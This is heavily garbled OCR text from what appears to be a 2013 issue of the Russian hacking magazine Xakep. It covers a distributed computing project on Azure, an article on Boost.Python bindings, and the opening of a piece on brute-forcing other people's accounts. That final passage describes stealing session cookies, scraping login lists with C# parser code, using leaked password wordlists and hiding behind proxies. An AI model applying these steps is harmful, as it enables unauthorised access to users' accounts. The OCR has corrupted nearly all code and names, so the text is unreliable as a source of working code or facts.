чение числа (с помощью метода ЗеесЧа) и ис- 
пользует это значение в качестве начального 
для дальнейших вычислений. 


Настройки для публикации проекта ты можешь получить по ссылке 
ние: сначала зайди в свой аккаунт Алиге. 
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Если выполняется попытка останова раздачи 
данных сервером (Зап == Та!5е), тогда значение 
флага сопго! устанавливается в Та] 5е (данный 
флаг служит индикатором работы сервера). 

Метод для управления сервером выглядит так: 


руб11с уо1а СопЕго1(Боо1 $з%аг*) 
{ 
// гие 
г (5ЕаебЕ) 
| 
// Обновляем значение р 
Могкегко]1е.К = могкегКоТе. <= 
5е1есетТа(); 
1+ (могкегКо1е.р >= -1) 
иМогкегко]1е. сопЕго1 = $Фаг\; 
Ото 
Могкегво1е. сопфго1 = №а15е; 
} 
е15е 
Иогкегко1е.соп{го1 = $Фаг®; 


Создание учетной записи клиента и реги- 
страцию клиента на сервере выполняет метод 
СгежеОгВесччег(оо!). Все зависит от значения 
передаваемого ему параметра: {гие — создание 
учетной записи, Та|5е — вход клиента на сервер. 
Этот метод вызывает метод Вео$ег на стороне 
сервера. 

Разработанный проект можно развернуть 
в облаке или локальном эмуляторе Алуге. Раз- 
вертывание сервиса в облаке выполняется после 
выбора пункта Ри Б!$И в контекстном меню соз- 
данной \М/огкег-роли. Запуск проекта в локальном 
эмуляторе — по нажатию на <Р5> в среде разра- 
ботки. 

Локальный эмулятор предоставляет воз- 
можность одновременного запуска и сервера, 
и вычислительного клиента. Для отладки в ло- 
кальном эмуляторе вычислительного клиента 
нужно в файле \\№огкегВое.с$, входящем в проект 
клиента, изменить адрес сервера (переменная 
епаРошт), а в интерфейсе управляющего клиен- 
та указать следующий адрес сервера: пЕ4ср:// 
1осайо${:3030/Сюца$егисе. 


ЗАКЛЮЧЕНИЕ 

Проект, описанный в статье, конечно же, можно 
использовать не только для вычисления простых 
чисел. Он может найти свое применение в рас- 
пределенной обработке звука, изображений, 
видео. 

Возможности совершенствования проек- 
та можно связать с полноценной реализацией 
луплексного режима обмена данными. В таком 
случае клиент не должен будет постоянно опра- 
шивать сервер, а запросит данные после того, 
как получит от сервера сообщение об их доступ- 
ности. 2 


. Примеча- 


Получить информацию и присоединиться к проектам распределенных вычислений ты смо- 
жешь на сайтах я 
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МЕЖДУ МИРАМИ 


.® 


Ускоряем 
разработку на С++ 
с помошью вВоо0$7. 


РуШоп 


/ 


У 


Владимир «дца» Керимов 
ведущий С++ разработчик 
компании «Тензор» 


диа!а6@дтаН.сот 


_ ее ПОСТАНОВКА ЗАДАЧИ 
Крупной компании, написавшеи платформу Поскольку прикладной функционал уже был логически поделен на сущ- 
для разработки СЛОЯ бизнес-логи ки на С++ ности и методы, написанные на С++ или на ЗОЕ, самым логичным было 
) 


взять скриптовый язык, популярный, легкий в освоении и, главное, чтобы 


П отребо валось ускорить раз работ ку прикладных сего помощью можно было налаживать взаимодействие с функционалом 
ядра из С++ и обратно. Если подытожить требования, то выбранный язык 
проектов для нее. Одно дело — писать на С++ | 


должен быть простым, 


ядро фун кционала, оптимизировать его . вотличие от С++ не требовать компиляции при изменении: 
: . вотличие от СЕ выполняться не на слое БД, ана слое бизнес-логики, 
и отлаживать, совсем другое — создавать что позволит вызывать другие методы, на чем бы те ни были написа- 
для него приложения: медленная сборка ее 
на С-+ отравит ЖИЗНЬ любому. А ВЫСОКИЙ порог Важно было не ошибиться, ведь язык скриптовой обвязки надолго 
` определял вектор развития компании. 
вхождения в С++ не позволит задействовать 


в разработке прикладных программ много НАРАСПУТЬЕ 


Выбор был неочевиден. В основном противники разделились на три са- 


людей ‚ Какже поступ ить? мых крупных лагеря: Уама$сир! \8, ВиБу Все и Вооз1.РУвпоп (конечно, 
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если не считать предложений поселить весь слой бизнес-логи- 
ки на стороне базы данных и переписать все методы на храни- 
мые процедуры). Звучали голоса в поддержку и нескриптовых, 
но легко компилируемых уауа и С# — каждый разработчик вся- 
чески агитировал за тот язык, с которым был больше знаком. 

Поскольку разрабатывать скриптовую обвязку выпало лич- 
но мне, то выбор передо мной стоял сложный. Руководство 
склоняло к обвязке на Виру, через сырую Все либо используя 
С АР!. Веб-отдел, предпочитающий решения на М№оаец5, ра- 
товал за выбор обвязки на уауаЗсирт и \8. Библиотека Воо$, 
широко используемая в разработке платформы на С++, гово- 
рила в пользу Воо${.РУПоп, как и ряд программистов на С++, 
хорошо знающих РУПоп (вариант переноса слоя бизнес-логики 
в Рооагез о! мы всерьез даже не рассматривали — это было бы 
чревато неправильно кешируемыми хранимыми процедурами 
и отсутствием возможности учитывать схемы, по которым были 
разбиты клиентские базы). 


ВЫБОР ВООЗТ.РУТНОМ 

В конце концов, оценив бесперспективность обертки через 
нестабильный функционал Вибу Нсе, а также удорожание 
разработки поверх Вибу С АР!, пришлось отказаться от Вибу 
как скриптового языка. Другие два решения: \8 (Чауа$сиру) 
и Воо$1.РУПоп (РУ{Поп) — выглядели намного привлекательнее. 

Сравнив богатство библиотек РуУПоп с молодым (для сер- 
верной стороны) набором уама$сирф, предназначенным боль- 
шей частью для Моде\$, я остановил свой выбор на мощном ме- 
ханизме Воо${.Ру{оп, позволяющем писать модули для Ру{оп 
на С++ в стиле Рупоп. З\М@ не подходил, поскольку требова- 
лось из РУПоп в С++ попадать так же свободно, как и из С++ 
в РУпоп. С АР!, учитывая объем работ, однозначно не годился. 

С библиотекой Воо$1.РУПоп у нас сразу заладились хоро- 
шие отношения, и я не раз убедился, что это действительно 
лучший выбор для обвязки С++ функционала при разработке 
приложений ещегри$е-уровня. Сыграла на руку и простота ос- 
воения языка РУпоп, читабельность его кода и богатство би- 
блиотек на РУйпоп. 

В самой обвязке и взаимодействии с С++ функционалом 
все настолько просто, что сродни магии. Магии порталов между 
мирами С++ и РУпоп, мирами языков настолько разных и так 
нуждающихся в возможностях друг друга. 


ВЫБОР РУТНОМ 3 

Когда с выбором языка было покончено, возник вопрос — какую 
ветку РУПоп использовать: 2.х или 3.х? Сделав ставку на долго- 
срочную перспективу, выбор остановили на РУПоп 3. 

Во-первых, третья ветка изначально лишена дефекта пута- 
ницы между строкой и байтами, во-вторых, исходный код пи- 
шется только в кодировке ЦТЕ-8, ну и в-третьих, РУ{Поп 3 избав- 
ляет от доисторического наследия синтаксиса, которым часто 
грешит РУПоп 2. 

Несовместимость версий РУПоп 2 и 3 не пугала, большая 
часть функционала была уже написана на С++, и даже если 
какие-то библиотеки к тому времени еще не были портированы 
на РУПоп 3, то они больше напоминали пережиток древности 
и спокойно заменялись альтернативами либо на С++, либо но- 
выми библиотеками, написанными уже для РУПоп 3. 


ОТКРЫВАЕМ ПОРТАЛ МЕЖДУ С+- И РУТНОМ 

Для начала давай вспомним, что общего есть между С++ 
и РуУПоп: классы, методы, исключения, общие типы скаля- 
ров. Так вот, все это Воо${.РуУ{Поп автоматически конвертирует 
при переходе между С++ и РУПоп и обратно, неявно вызывая 
тонну РуПоп С АР! и проверяя корректность преобразований 
еще на этапе компиляции обертки С++ функционала. 

О’кей, звучит круто, но как это выглядит на практике? Очень 
просто. Предположим, у нас есть модуль с классами и их мето- 
дами. Обертка с помощью Воо${.РуПоп пишется очень легко: 
описывается аналогичный модуль для РУПоп и с помощью ме- 
таязыка шаблонов С++ пишется код, подозрительно напоми- 
нающий РУПоп. Но давай посмотрим, как это работает на кон- 
кретном примере. 


С-зае 
Ниже код некоего абстрактного модуля Б5оп с классом Веааег 
и методом геаа, написанными на С++: 


ВОО$Т_РУТНОМ_МОРИЕЕ (6$оп) 
{ 


с1аз$_<65оп: :Веадег> ("Везааег”) 
.ЧеР("“геаа", &65оп: : Веадег: : геаЧ) 


Обрати внимание, что шаблон с!а$$_ не имеет ничего об 
щего с ключевым словом с!а$$ обоих языков, а метод аЕЁ все- 
го лишь метод шаблона с!а$$_, однако визуальный эффект 
достигнут — код обертки легко читается и выглядит понятно 
и знакомо. Теперь можно и скомпилировать. 


РуПоп-зае 

После компиляции можно наш свежесобранный модуль 6$0п 
импортировать из РУПоп, создавать экземпляры класса 
65оп.Веааег и вызывать у него метод геаа, по сути обертку, 
которая напрямую позовет метод геаа класса $оп::Веадег, 
написанного на С++. 


1трогЕ 6$оп 
геадег = 65оп.Веааег() 
геадег .геаа() 


Магия портала в том, что мы можем использовать 
как С++ в РУпоп через модули, так и РУПоп в С++ через те 
же модули и их подключение. Динамическая типизация 
РУ{Поп на стороне С++ обеспечивается специальным типом 
боо3$1::ру{Поп::обест, который является контейнером для лю- 
бого типа РУПоп в С++. Вот так мы получаем динамическую 
типизацию на стороне С++! 

Теперь посмотрим на другой пример: 


об]есе ]зоп = 1трог* ("оп"); 
об]есЕ гез = ]зоп.аЕг(“1оаа5") ( 
"{\"Кеу\" : \"уа1че\"}"); 
$Ег1п8 уа1ие = ехгасе<5%г1п8> (гез["кеу"]); 


Этот код аналогичен выполненному на РУПоп }5оп. 
]1оа4$('{"Кеу": "уа1ие"}'), но написан на С++, что позво- 
ляет вызывать из функционала платформы любую обертку, 
как и любую библиотеку РУПоп. Это весьма полезно для ис- 
пользования обобщенных механизмов, работающих из С++ 
с кодом на РУПоп. В нашем случае это вызов методов биз- 
нес-логики, написанных на РУПоп, ядром бизнес-логики, на- 
писанным на С++. 

Вся работа из С++ с библиотеками на РуПоп сводится 
к трем основным функциям: * 

. Имром; . 
. анг; < 
. ехшаст. ь 


Функция итро("модуль") возвращает по сути Б003$1:: 
руУПоп::оЦесф, представляющий объект модуля, который мы 
импортируем с теми же самыми атрибутами. В свою оче- 
редь, атрибут любого объекта РУ{Поп с помощью ощес{ Вооз1. 
Ру{Поп можно получить методом обесЕ::аНг("атрибут"), воз- 
вращающим такой же обес, связанный с классом, методом, 
переменной — в общем, любым объектом языка РУПоп. 

Функции Рупоп можно вызывать из С++ перегружен- 
ным оператором оБес"::орегатог(), доступ к элементам 
массивов РУПоп из С++ получаем с помощью перегрузки 
оБес{::орегао!г|], и то и другое возвращает обест, связан- 
ный с результатом операции в РУПоп. Чтобы добыть из оЩес{ 
нужный тип Т языка С++, нужно явно вызвать шаблонный 
функтор ехнас<Т>(объект). Чтобы, наоборот, получить 
из типа Т тип оЩес{, достаточно передать его в конструктор 
при создании оЩескКзначение). При этом в обе стороны, 
скрытый от глаз разработчика, не покладая рук трудится кон- 
вертер Воо${.РУПоп. 

Стандартные типы языка Ру{оп ${г, 151 и Ч1с{ представ- РУО 
лены в библиотеке Воо$.Ру Поп соответственно классами 
Зе, 151 и @сф унаследованными от оес. В принципе, ни- 
что не мешает нам работать с $1 через оЦес, вызывая ме- 
тод аррепа через аНк("аррепа"), но куда удобнее позвать 
5: :аррепа из С++. 


Смотри пример настрой- 
ки конвертации типов 
между С++ и РУ Поп 
на диске. 


то2 Кодинг 


УПРАВЛЯЕМ СБОРКОЙ 
МУСОРА РУТНОМ ИЗ С++ 


Вероятно, самым существенным различием между С++ 
и РУПоп является сборщик мусора РуУпоп (СС — датфаде 
со!естог), которого нет в С+-. Работа с указателями и ссылками 
на стороне С++ держится на уровне мастерства разработчика, 
который не дает памяти «утекать» (на память перестают ссы- 
латься, но удалить ее забыли), а указателям «ездить по памяти» 
(указатель на объект вышел за пределы отведенной ему памяти 
и начал затирать данные других объектов). В РУПоп ненужные 
объекты, на которые перестали ссылаться, автоматически уда- 
ляются специальным механизмом сборки мусора. 

В случае обертки метода, возвращающего указатель или 
ссылку, в С++ обычно подразумевается какое-то действие: 
либо это указатель, переданный во владение пользователю ме- 
тода, либо это ссылка на существующий объект, который уда- 
лять нельзя. Все это нужно объяснить сборщику мусора РУПоп, 
когда мы оборачиваем метод, возвращающий указатель или 
ссылку. Исключение составляет соп${ спаг*, который автомати- 
чески преобразуется в строку $1 на стороне РУПоп. 

Чтобы объяснить сборщику мусора, что нужно делать с ука- 
зателем, который пришел из метода на С++, нужно прописать 
политику возвращаемого значения через шаблонную функцию 
гаигп_уаше_ройсу при обертке метода. Параметром шаблона 
передается одна из политик: вернулась ссылка на существу- 
ющий объект геегепсе ежз{та_обесф, и удалять его нель- 
зя, нам вернули ссылку на новый объект тападе_пем/ ощесч 
и передали во владение, чтобы мы удалили его по окончании 
использования, и еще пара функций сору_соп${ геТегепсе 
и сору поп_соп${ геГегепсе для того, чтобы создать новый объ- 
ект, скопировав его по ссылке, вернувшейся из метода. 

Чаще всего методом возвращается ссылка на элемент объ- 
екта, который тяжело возвращать по значению. Например, у нас 
есть запись выборки из базы данных ааа: :Весога и нам нужно 
прочитать какое-то поле ааа::РНе]ч из этой записи. Логичнее 
всего перегрузить орегатю!|[], который будет возвращать ссыл- 
ку на хранящееся в записи поле адаа::Неа&. Чтобы обернуть 


.аеЕ(" _веЕ1%ет__", &аажа: :Весога: : 
орега®ог| ], 
гефигп_\уа]1ие_ро11су 
<гефегепсе_ех15${1п=_об]ес®>()) 


Если нужно клонировать объект методом с!опе, то создаем 
новый объект и передаем его во владение вызвавшему коду. 
Для РуПоп требуется указать политику тападе пем/ обес. 


ВОО$Т_РУТНОМ_МОБИТЕ (да*а) 
4 


с1аз$_<4а*а: :Кесога> ("Кесога") 
.аеЕ("с1опе", &аажа: :Весога: : с1опе, 
гефигп_\уа]ие_ро11су 
<тапаёе_пем_об]ес*>()) 
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Когда возвращается ссылка на тип, который конвертирует- 
ся в соответствующий тип РУПоп без обертки, например ссыл- 
ка на $1а::$та, конвертирующийся в $1г, то требуется указать 
политику сору соп${ гетегепсе или сору_поп_соп${_геТегепсе. 
Просто так обернуть функцию, возвращающую указатель или 
ссылку, через Воо${.РуУПоп, увы, не получится, библиотека от- 
ловит еще на этапе компиляции попытку обернуть неопреде- 
ленное поведение для сборщика мусора для возвращаемого 
значения. 

Пусть у нашего поля записи ааза::Неа есть имя, которое 
хранится в виде $а::${ип9, и методом пате() возвращается 
соп$т ${::$па& — константная ссылка на имя поля. В этом 
случае обертка метода будет выглядеть так: 


ВОО$Т_РУТНОМ_МОРИЕЕ (даха) 


ссылку-результат объектом РУПоп, при изменении которого { 
будет изменяться исходный объект С++, нам понадобится по- стае Часа.: Е1е1а>(“Е1е1а") 
литика геГегепсе_ехзНпта_оес{ примерно так: ее. сдага:: Еле]: : пате, 
гефигп_\уа1ие_ро11су 
ВОО$Т_РУТНОМ_МОБВИЕЕ (аафа) <сору_соп5*_ге+егепсе>()) 
4 ; 
с1а55_<Аа*а: :Весога>( ) } 


Е -Нить сборшику мусоре в 
ВИТЬ с указателем С++, иван 


| нкцию гетигп уд В аа 


°. 
э® 
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кз 
: в _ 
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ПМЕО 


При указании политики 
геегепсе_ех!${та_ обес 
возвращается все равно 
новый объект. В нем со- 
держится ссылка на объ- 

ектС-+-+, для которого 
должна существовать 
обертка в РУПоп. 


МЕО 


Политики сору соп${_ 
гетегепсе и сору_ 
поп_сопз{ геегепсе 
действуют не только 
на типы с конвертацией, 
описываемой через 
{0 руУпоп_сопуепег, это 
самый логичный путь 
обернуть метод С++, 
возвращающий в РУ поп. 


ХАКЕР 10 /177/ 2013 Портал между мирами 


РАБОТАЕМ СПЕРЕГРУЗКАМИ 


МЕТОДОВ С++ 


РУпоп не умеет перегружать методы. РУПоп не может огра- 
ничить тип аргумента. Поэтому порой первым действием раз- 
работчика метода на РуПоп бывает проверка 15т$апсе одного 
из аргументов или вызов скрытых (риуа{е) методов в зависи- 
мости от количества и типа аргументов — по сути перегрузка 
вручную. Язык С++ обладает статической типизацией, что по- 
зволяет вызывать одноименные методы с разной реализацией 
для разного количества и типа аргументов. 

Воо${.РУИоп позволяет оборачивать методы С++ одно- 
именными методами РУПоп, поддерживая перегрузку на сто- 
роне РУПоп! 

Технически это решается гипите — на этапе выполнения, 
просто выбирается подходящая перегрузка метода на С++ 
и вызывается нужный метод либо генерируется исключение, 
что необходимая перегрузка не найдена. 

Пусть есть класс поля записи выборки из базы данных 
ааа:: Неа, типизируемый динамически (в С++ это можно сде- 
лать, например, через Боо3${::уапап{). Поле задается значе- 
нием произвольного типа через перегрузку метода Неа::зет_ 
бу(значение) по типу аргумента. Например, так: 


ВОО$Т_РУТНОМ_МОРИЕЕ (да*а) 
4 


с1а$$_<Е1е14> ("Е1е1а") 
.аее("зе*_ ру", $зЖаЕ1с_саз<\о1Я «= 
(Е1е1а: :*) (аочЬ1е)> (&Е1е14: : зе*_Бу)) 


.аее("зе*_ ру", $зЖаЕ1с_саз*<\уо1Я «== 
(Е1е1а::*)(1оп? 1опр)>(&Е1е14: : зе _Бу)) 


.аее("зе*_ ру", $ЖаЕ1с_саз*<\уо1Я «= 
(Е1е14::*)(соп$Е сПаг*)> (&Е1е14: :зе*_Бу)) 


В РУПоп мы получаем один метод-обертку, который при вы- 
зове от типа аргумента вызовет перегрузку метода С++ соот- 
ветствующего типа. 


1трогЕ аа 

бе14 = дафа.Е1е1а() 

# перегрузка от 1оп8 1015 
бе1а.зе{_ Бу(19) 

# перегрузка от доиБ1е 
бе1а.зе{ Бу(3.45) 

# перегрузка от соп$е сПпаг* 
бе14.зе{_Бу(‘ строка" 


Но самое интересное — это перегрузка конструктора __тК__ 
в РУПоп, хотя бы просто потому, что доступ к конструктору С++ 
вообще-то запрещен, однако все перегрузки конструктора обо- 
рачиваемого класса можно без проблем передать в РУПоп! 


с]1азз_<4афа: :Е1е1а>("Е1е1а", 1п1<‹аочб1е>) 
// объявляем как обычный метод_ае+ 
.аеР(1п1*<1опй 1опё>) 
‚ ае(1п1%<5{4: : $&г1пв>) 
конструктор по умолчанию прописан явно 
. аее(1п1*<>) 


При создании объекта-обертки в РуУПоп вызывается нужная 
перегрузка конструктора исходного типа ааа::Реч в С++. Это 
ли не чудо?! 

На практике это будет выглядеть так: 


гот Чафа 1троге Е1е1а 
# конструктор от 11 
а = Е1е1а(55) 


# конструктор от Ноа 
Ь = Е1е19(2.72) 

# конструктор от $4: : $Ег1пв 

с = Е1е1а(‘строка’) 

# конструктор по умолчанию 

а = Е1е1а() 


Ложка дегтя 

Перегрузка методов в РУПоп выглядит соблазнительно, но есть 
один момент: Воо${.Ру{оп может запросто перепутать пере- 
грузку, поскольку подбирает подходящую сигнатуру метода 
С+- уже на этапе выполнения! 

В отличие от компилятора С++, который может выбрать 
из всех возможных перегрузок метода наиболее подходящую 
для списка аргументов еще на этапе компиляции, библиотека 
Воо$1.РУПоп вынуждена обходиться первой подошедшей сиг- 
натурой метода. Усложняет дело то, что Ши Боос! прекрасно 
преобразуются друг в друга, также прекрасно преобразуется 
иво Ноа. Чтобы совсем осчастливить разработчика, подбор 
наиболее подходящей перегрузки из обернутых идет из конца 
в начало, то есть первой попробует себя на роль вызываемого 
метода последняя обертка и далее снизу вверх. Другими сло- 
вами: объявляем перегрузку от Ноа{ после перегрузки от и 
и никогда не попадем в перегрузку от и\, а если после пере- 
грузки от ш{ обернуть перегрузку от Боо|, то будем попадать 
только в него, даже вызывая перегрузку от целочисленного 
аргумента. 

Но выход есть, он прост и ясен для любого, кто знаком с по- 
нятием зе! в РУПоп. 
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ШМЕО 


В РУоп довольно 
просто создать риуае- 
метод. Для этого всего 

лишь нужно назвать 
его начиная с двух под- 
черкиваний, например 

_мадеп_тепод. 


Кодинг 


До сих пор мы пользовались встроенным в Воо${.РУПоп преобразованием 
неявно передаваемого параметра {115 в С++ в параметр $еЁ в РУПоп. Также 
известно, что в РУйоп любая функция, принимающая первым параметром 
зе!-аргумент, может считаться методом и, наоборот, метод можно вызывать 
как простую функцию, передавая $ей явно. Все это можно сделать на стороне 
С++ в виде внешней функции, принимающей $е1, и обернуть ее как полно- 
ценный метод класса-обертки. 

Таким образом, для задания своей логики в обертке не надо городить 
классы-наследники или портить исходный класс логикой, нужной только 
в РУПоп, и уродовать АР! на стороне С++. Все, что требуется, — написать 
внешнюю функцию, принимающую первым параметром ссылку на $е! нуж- 
ного типа, и на стороне РуПоп это будет полноценным методом класса. Вот 
так, например, решается наша проблема с перегрузкой: 


\о1а Е1е1а_5е*_Бу(ааЖа: :Е1е1а& зе1+, обЗесЕ уа1ие) 
ы 


1+(ма1че.15_попе()) 
5е1+. зе _Бу(пи11 рег); 
е1зе 1+(РУВоо1_Спеск(уа1ие.рг())) 
5е1+. зе Бу(ехЕгасе<6оо1> (ма1ие)); 
е1зе 1+(РуЁопё_СНеск(уа1ие.рг())) 
5е1+. зе Бу(ехЕгас®<1опв 1опр>(уа1ие)); 
// далее по аналогии для всех типов 


ВОО$Т_РУТНОМ_МОРИЕЕ (даха) 
{4 


с1а5$_<4ажа: :Е1е1а> ("Е1е1а") 
.ае+("зе*_Бу", Е1е14_зе* Бу) 


Мы мало того что избавились от проблемы с перегрузкой, так еще и ре- 
шили ее чисто. Логика обертки в Ру{Поп сохраняет все свойства исходного 
класса С++, ине теряется прозрачность обертки — главное условие хорошего 
межязыкового АР!. Программист на РУПоп, знающий особенности исходного 


ОБОРАЧИВАЕМ ШАБЛОННЫЙ МЕТОД 


ХАКЕР 10 /177/ 2013 


ПОЛЬЗУЕМ ЗЕЕ РУТНОМ ДЛЯ ФУНКЦИЙ С++ 


АР|, просто пишет на РУПоп так же, как он писал бы на С++, при работе с объ- 
ектом класса, но уже в стиле РУПоп. 
Проверяем в РУПоп, что получилось: 


Его дафа 1трогЕ Е1е1а 

бе1а = Е1е1а() 

Не1а.зе{ Бу(М№пе) # перегрузка от пи11рЕг_Е 
бе14а.зе{_Бу(Тгие) # перегрузка от 6001 
пе1а.ъе{_Бу(12 # перегрузка от Топ 1оп 


Вот таким нехитрым способом получили бонус в виде перегрузки от Мопе. 
Кстати, вполне можно использовать питоновские типы @с{, 1$, тире, $ 
из патезрасе 6оо${::руУПоп, к ним всегда приведется корректно, в отличие 
от скалярных типов. 

Все то же самое верно и для конструктора, просто внешняя функция долж- 
на не принимать $е1 в виде параметра, а возвращать ссылку или указатель 
на новый объект нужного типа. В нашем случае это будет выглядеть вот так: 


Дажа: :Е1е1а* Е1е1а_пем_Бу_ обес (об]есЕ уа1ие) 
{ + 
1+ (ма1ие.15_попе()) 
гефиги пем Е1е1а(пи11рег); 
е15е 1+(РУВоо1_СпПеск (\ма1ие.рг())) в 
5е1+.5зе{_Бу(ехЕгас{<6оо1> (ма1ие)); РУ С 
//_..и далее по аналогии с Е1е1а_зе* Бу... 4 


) ` 
ВОО$Т_РУТНОМ_МОБИЕЕ (дата) . 
{ ы 
с1а55_<АаЖа: :Е1е1а>("Е1е1а”) . $ 
„.деРт(“ 1011 “, Е1е1а_пем _Бу_обдес®) : 
} МР. 


Вот так простые функции становятся методами класса-обертки, помогая 
строить логику класса в РУПоп. 


Пусть на стороне С++ у поля ааа:: Не есть шаблонный метод 
че<Т>, реализованный для всех допустимых типов. На сторо- 
не РУПоп не имеет смысла возвращать кучу разных типов, бу- 
дем возвращать 6оо${::ру{Поп::обес{. Для демонстрации того, 
как работает обертка шаблонного метода, добавим полю при- 
ведение ко всем возможным типам. 


оБ]есе Е1е14а_веф(сопзЕ Е1е14а& зе1+) { 
11(5е1+.1$_пи11()) 
гефиги обес*(); 
м1 СН (зе1+.%уре()) { 
сазе Е1е1а: :ОР_ВОО| : 
гериги обес (зе1+.вее<6оо1>()); 
сазе Е1е1а: : ОЕ _ТМТ: 
гефиги обБЗес* (5е1+.веф<1опе 1оп8>()); 
// так же для остальных типов 


АСТОИЛАЛИ ИГРА СВЕЧ? 

Безусловно, да. Технология обертки функционала платфор- 
мы через Воо${.РуПоп оправдала себя на все сто. Последние 
противники давно стали ее сторонниками и пишут методы биз- 
нес-логики на РУПоп. Разработка движется семимильными 
шагами, все, чего нет в С++, находится в РУПоп, и наоборот. 
Штат разработчиков пополняется все новыми сотрудниками — 
уже не требуется знание С++, достаточно знания РУПоп. Сам 
же Воо${.РуПоп зарекомендовал себя как очень стабильная 


ВОО$Т_РУТНОМ_МОБИЕЕ (да\а) { 
с1аз5_<аЖа: :Е1е1а>("Е1е1а”) 
.аее("вет", &-1е14а_ве*) 
.аее(" _Боо1__", &Е1е1а: : ве <Боо1>) 
.аее(" _1п*__", &Е1е14: :РеЕ<1опв 1опв>) 
так же для остальных типов 


Ну вот, осталось только добавить в даа::Весога мето- 
ды индексации __дещет__ и _ зещет__. Кроме того, если 
в С++ классе определены методы Бедт() и епа() (или ана- 
логичные им), то Воо${.Ру оп напрямую пробросит и ите- 
рацию _ Нег _ по элементам объекта-обертки. Можно так- 
же перегрузить __5ефаЕ{г__ и __ефаЕг__ по имени поля, 
тогда получим едва ли не ОВМ поверх обычного С++ класса. 
Все ограничивается только неистощимой фантазией разра- 
ботчика (то есть ничем). 


библиотека, избавляющая от множества ошибок еще на этапе 
компиляции. 

Но главное — оборачивать код с помощью Воо${.РУПоп ста- 
ло по-человечески приятно. Работая с продуманным до мело- 
чей АР! Воо${.РУПоп, с тем, как она устроена, многому учишься 
сам — в том числе заботиться о пользователе твоего АР! так, 
чтобы ему было комфортно. Глядя на устройство Воо3$1.РУПоп 
понимаешь, что такое совершенство. Сам же процесс сродни 
магии... магии порталов между мирами С++ и РУПоп. 2= 


РУО 


Смотри пример раз- 
бора исключений РУ Поп 
на стороне С++ итранс- 

ЛЯЦИИ СВОИХ ТИПОВ 
исключений из С++ 
в РУпоп на диске. 


МЕО 


Все просто: нужен 
специфический метод — 
пишем внешнюю функ- 
ЦИЮ С эмуляцией зе, 
нужен специфический 
конструктор — пишем 
внешнюю функцию, 
возвращающую новый 

объект. 
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Внимание! Инфор- 
мация представлена 
исключительно с це- 
лью ознакомления! 
Ни авторы, ни редак- 
ция затвои действия 

ответственности 
не несут! 


ПАРСИМ, 
БРУТИМ, 


Как хакеры восстанавливают 


забытые пароли с помощью 
С 5Нагр 


тоб Кодинг 
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Очень тяжело в последнее время стало с запоминанием паролей. Ресурсов много, все не упом- 
нить, и даже менеджеры паролей по ряду причин пользователям не всегда помогают. Как быть? 
В этих случаях простые смертные обращаются к своим друзьям-хакерам, и последние подска- 

зывают им, как восстановить утраченное. 


СНИФИНГ 

Первым делом хакер сам проходит регистрацию 
на целевом ресурсе. Таким образом он получает 
сооке, небольшой фрагмент данных, применяе- 
мый для аутентификации пользователя. Перехват 
как правило осуществляется при помощи извест- 
ного Вигр Зийе (розмлааег.пе/Бигр) или набора 
специальных плагинов пентестера для его лю- 
бимого браузера. Вот, кстати, некоторые из них: 
Сооде Спготе (Нпуучйт.сотЛориааР) и Егеюх 
(НпуиИ.сот/оюезЗао). 


КОДИНГ 

Добыв печеньку, хакер начинает писать програм- 
му, ее дизайн и функционал от сервиса к сервису 
практически не отличаются. 

Задача программы сводится к получению 
на вход списков логины/пароли, прокси НТТР / 
ЗОСК$ 4 / ЗОСК$ 5 и количества рабочих потоков 
процесса. Обязательно должна присутствовать 
огромная кнопка «Старт». 

В нашем примере использована библиотека 
хМе{ — библиотека классов под .МЕТ Егатемогк 
(ПЕ р$://а(Пи6.сот/Х-гиз/хМе{). 

Но перед этим он еще должен получить этот 
самый список логинов: можно набирать его вруч- 
ную, что весьма долго, а можно автоматизиро- 
вать процесс сбора данных парой строчек кода. 
Этот метод принято называть парсингом, суть 
его в случае сбора логинов сводится к получе- 
нию страницы с нужной строкой, ее анализу, со- 
хранению и повтору операции уже со следующей 


страницей. На картинке («Интерфейс») элементы 
управления парсингом находятся в правой части. 


Парсер 

В поле СЕТ хакер вводит адрес сайта для загруз- 
ки, чуть ниже указывает стартовую и последнюю 
страницу, а также шаг между ними. Это требуется 
в случае нумерования страниц в порядке, отлич- 
ном от 1, 2, 3... 

Далее он вписывает уникальный набор симво- 
лов из искомой страницы в два пустых поля, меж- 
ду которыми и находится логин. По сути, вместо 
логина может быть и любая другая интересующая 
хакера информация (телефоны, почта, номер !СО, 
ЗКуре), так что применение парсеров может быть 
весьма широким. Теперь посмотрим, как это при- 
мерно выглядит на С#. 


и$1п2 (маг Ведиез = пем НЕ&рКеадие$*()){ 
// Загружаем исходный текст страницы 
5&г1па 5оиг$Раве; 
${г1п8[] гам; 
// Адрес сайта, куда подставляется 
// номер страницы для сохранения 
5оиг5Раге = Кеаче$* .бе* (б61оБа1 . «= 
Рагзегбее + МитБег).То5г1п8(); 
// Парсим слово между этими строками 
гам = Зоиг$Раре .5и65г1п85$ (61оБа1 .«= 
Раг5ег5{г1п8Егот, @61оБа1. += 
Рагзег5{г1пёЕпа, 9); 
Фог (11 1 = 0; 1 < гам. ЬепёЕИ; 1++) 


{ 


М1скК += гам[1] + "\к\п"; 


} 


гефиги МСК; 


} 


// Каждый поток посылает свое 
// уникальное значение 
5/11 №1сК = СВескРагзегМе*поа (@61оБа1 . «= 
Раг5зегТезТМТ); 
УВЕ СК 
6]оБа1 .Раг5егМ№М1сКкМамте . Ада (№1сК); 
61оБа1 .Соип®боо4 += 1; 


:; е]зе { 
61оБа1 .СоипВаа += 1; 
} 


Программа загрузила страницу, пробежалась 
по всем строчкам в поисках нужного слова, выве- 
ла результат на консоль. Просто, как раз-два-три. 
Можно сказать, что логины в кармане, остались 
пароли. Придумывать их самостоятельно сложно 
и долго, поэтому чаще всего используются чужие 
словари. Один из самых популярных — госКуоч. 
{хЬ а множество других доступно на тзаерго.сот 
(Нпуи!.сот/рпратаг). 


Прокси 

Простой, но очень важный компонент: именно че- 
рез прокси направляются все запросы и возвра- 
щаются ответы, что оказывает огромное влияние 
на правдоподобность результатов работы про- 
граммы. Хакеры не желают терять время впустую 


Рагатз | НеаЧдегз | Нех 


СЕТ ты | — 
Нозс: — 


в НТТР/1.1 


Вапае: Бусез=0- 
ВеЁегек: НЕбр:// —= 


Пзег-Адепс: Мо2111а/5.0 (М1паомз МТ 5.1; ЕУ:23.0) СбесКко/20100101 Е1хеёох/23.0 
Ассерс: ац@1о/ мер, ааЯ1о/ оаа, ацЯ1о/ мау, ай 10/ *; ч4=0.9, арр11сас1оп/ ода; 4=0.7,м1аео/*; 4=0.6,*/*; ‹=0.5 
